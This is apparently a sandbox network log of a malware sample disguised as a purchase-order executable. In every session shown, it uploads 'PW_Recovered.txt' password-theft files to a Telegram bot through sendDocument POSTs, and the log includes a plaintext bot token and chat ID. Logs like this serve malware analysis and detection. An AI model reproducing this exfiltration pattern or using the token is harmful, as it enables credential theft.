2024-12-16 13:15:21 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 66 62 36 38 36 39 35 64 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd20fb68695da8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:21 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:22 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17185,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354921,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49809	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:23 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd21311e408dc9 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:23 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 33 31 31 65 34 30 38 64 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd21311e408dc9Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:24 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:23 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:24 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17187,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354923,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49815	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:25 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd216cdca9611f Host: api.telegram.org Content-Length: 581
2024-12-16 13:15:25 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 36 63 64 63 61 39 36 31 31 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd216cdca9611fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:26 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:25 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:26 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17189,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354925,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49821	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:27 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd21b60195c746 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:27 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 62 36 30 31 39 35 63 37 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd21b60195c746Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:28 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:27 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:28 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17191,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354927,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49824	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:29 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd2201535bf242 Host: api.telegram.org Content-Length: 581
2024-12-16 13:15:29 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 30 31 35 33 35 62 66 32 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd2201535bf242Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:29 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:30 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17193,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354929,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49829	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:31 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd22651478ebb6 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:31 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 36 35 31 34 37 38 65 62 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd22651478ebb6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:32 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:31 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:32 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17195,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354931,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49835	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:33 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd22b575741c71 Host: api.telegram.org Content-Length: 581
2024-12-16 13:15:33 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 62 35 37 35 37 34 31 63 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd22b575741c71Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:34 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:34 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17197,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354933,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49841	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:35 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd232ee45a716c Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:35 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 32 65 65 34 35 61 37 31 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd232ee45a716cContent-Disposition: form-data; name="document"; 